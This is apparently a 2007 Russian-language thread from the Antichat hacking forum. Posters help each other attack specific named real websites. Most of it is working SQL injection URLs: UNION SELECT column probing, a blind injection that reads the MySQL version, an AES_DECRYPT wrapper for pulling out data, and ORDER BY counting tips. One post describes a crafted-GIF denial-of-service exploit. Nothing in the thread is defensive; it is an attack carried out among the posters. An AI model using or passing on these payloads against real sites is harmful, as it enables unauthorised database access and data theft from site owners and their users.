ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Ваши вопросы по уязвимостям. (https://forum.antichat.xyz/showthread.php?t=46016)

Scipio 10.08.2007 13:09

Вобще этот сплоит создает картинку Art.gif которая при ее загрузке вызывает DOS но этот сплоит немного исправить надо (под винду)

а в целом действуй так, как посоветовал n1†R0x, только вот по идее когда ты сам картинку будешь смотреть у тебя винда уйдет в аут...

вопрос: зачем он тебе нужен? :)

x.Elf 10.08.2007 15:34

нашел количество полей - пытаюсь вывести бд ругается.......
http://www.suvd.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

blackybr 10.08.2007 15:38

x.Elf делай через подзапросы

Scipio 10.08.2007 15:56

там 3 версия мускула, а внем union select не работает...

Код:

http://www.suvd.ru/news.php?id=4825%20and%20ascii(lower(substring(Version(),1,1)))=51/*
ascii("3")=51

Taylorith 10.08.2007 17:39

тут сайтец с скуль уязвимостью...

http://www.mediacomp.ru/?action=sub_kat&top_kat=-1,union+select+1/*

самое ссмешное то что я подобрал до 72 и нифига ничего не вылезло.... что предложите сделать ....?

Y.Dmitriy 10.08.2007 17:44

Цитата:

http://www.mediacomp.ru/?action=sub_kat&top_kat=-1+union+select+1,2,3/*
юзай "-1+ORDER+BY+.../*" помогает...

Taylorith 10.08.2007 17:47

то есть ты хочешь сказать что истина полюбе есть, тока находится далеко и мою работу облегчит данная фича?? или как??

x.Elf 10.08.2007 17:50

Цитата:

Сообщение от Taylorith
тут сайтец с скуль уязвимостью...

http://www.mediacomp.ru/?action=sub_kat&top_kat=-1,union+select+1/*

самое ссмешное то что я подобрал до 72 и нифига ничего не вылезло.... что предложите сделать ....?

http://www.mediacomp.ru/?action=sub_kat&top_kat=-1+union+select+1,2,3/*
http://www.mediacomp.ru/?action=sub_kat&top_kat=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version (),0x71),0x71)/*

x.Elf 10.08.2007 17:56

Цитата:

Сообщение от Taylorith
то есть ты хочешь сказать что истина полюбе есть, тока находится далеко и мою работу облегчит данная фича?? или как??

http://forum.antichat.ru/thread19605-mysql+inj.html

сначало прочти, а потом и вопросы...
не тупи...

Alexsize 10.08.2007 17:57

заюзай AND


Время: 10:31